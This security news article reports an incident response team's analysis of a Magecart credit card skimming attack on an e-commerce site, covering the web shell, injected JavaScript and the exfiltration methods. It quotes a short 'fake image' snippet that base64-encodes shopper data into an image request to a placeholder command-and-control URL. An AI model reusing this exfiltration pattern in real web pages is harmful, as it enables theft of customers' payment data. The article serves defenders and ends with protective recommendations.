The notorious Magecart group has been identified by the Yarix Incident Response Team as the culprits behind a recent credit card data theft operation on an e-commerce platform.
This latest assault on consumer data showcases the group’s evolving tactics to infiltrate and compromise online payment systems.
Initial Access and Web Shell Deployment
The attack began with Magecart utilising stolen credentials, likely harvested through an infostealer malware, to gain initial access to the website’s backend.
.png
)
Once access was secured, the attackers uploaded a malicious PHP script to the server, which functioned as a web shell.
This web shell, based on the structure of the open-source P.A.S. Fork v. 1.4, provided them with complete remote control over the server, enabling persistent access and the ability to execute commands without regular user interaction.
Further investigation revealed that Magecart had infiltrated the site’s database, polluting it with hidden, malicious JavaScript code.
This code, disguised within a seemingly innocuous <img> tag, was designed to activate whenever certain pages were loaded, performing background operations like data exfiltration without user knowledge.
The script was embedded in a way that ensured its execution even if the initial access method was compromised, showcasing a deep level of persistence in their attack strategy.
Exfiltration Methods: WebSocket Connection and Fake Images
The data exfiltration was ingeniously executed through two primary methods:
- WebSocket Connection: A function named “createWebSocket” was employed, establishing a WebSocket connection with the attackers’ command-and-control (C&C) server. This connection allowed for real-time, bidirectional communication for sending stolen data in a manner that was difficult to detect due to the protocol’s encryption and the dynamic nature of the connection parameters. JavaScript
function createWebSocket() { // ... WebSocket setup and data exchange logic } - Fake Images: Additionally, a technique known as “fake image” exfiltration was used where user data, including email, addresses, and credit card details, were encoded into URLs and set as the source of image objects. These objects would then make requests to the attacker’s server, appearing as legitimate image downloads but in reality, serving as covert data channels. JavaScript
function createImage(dataToImg) { var objImage = new Image(); objImage.src = "//C&C server URL//?data=" + window.btoa(dataToImg); }
Magecart’s latest attack highlights the critical need for enhanced security measures in the face of evolving cyber threats.
Recommendations include strengthening password policies, implementing two-factor authentication, and ensuring all software is up-to-date.
Moreover, regular code audits, employing advanced XDR (Extended Detection and Response) systems, and installing web application firewalls are advised to detect and mitigate such attacks promptly.
This incident serves as a stark reminder of the persistent and adaptive nature of cybercriminals, urging a proactive approach to cybersecurity in the e-commerce sector.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
